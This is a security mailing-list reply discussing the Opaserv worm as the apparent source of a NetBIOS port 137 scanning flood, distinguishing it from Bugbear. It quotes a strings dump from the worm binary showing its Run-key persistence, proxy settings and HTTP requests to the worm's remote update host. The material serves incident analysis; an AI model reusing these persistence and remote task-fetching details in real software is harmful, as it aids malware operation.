RE: Unusual volume: UDP:137 probes

[Nick FitzGerald <nick () virus-l demon co uk>]

Richard.Grant () mail state ky us wrote:

> We had some internal machines that were contributing to the netbios flood
> attack. These machines were sniffed and from that we found a file on the
> identified machines named scrsvr.exe. The file was reversed engineered and
> the results are listed below. While some are attributing the netbios
> activity to Bugbear@mm it does not follow what we were seeing. It is known
> as W32.Opaserv.Worm.  Comments?

Two...

You are right that Bugbear does not produce the flood of port 137 
traffic currently being reported.  Bugbear does some spreading via 
open or otherwise accessible shares (those writable with the 
permissions of the user that ran the EXE) but it uses standard 
known network resource enumeration APIs to do its work.  Opaserv (aka 
Scrup, Scrsvr, Opasoft) aggressively scans for machines listening on
port 137 and is the likely source of most of the increased port 137 
activity.

> ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Wind
> ows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Interne
> t
> Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat
> .ScrSout.dat.scrupd.exe.www.opasoft.com.GET
> http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0
> HTTP/1.1..Host: www.opasoft.com.....GET
> http://www.opasoft.com/work/lastver HTTP/1.1..Host:
<<snip>>

Good thing that, unlike in Bugbear's case, the EXE was not packed 
with a runtime compressor.  Running strings on an EXE hardly counts 
as "reverse engineering".


Regards,

Nick FitzGerald

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com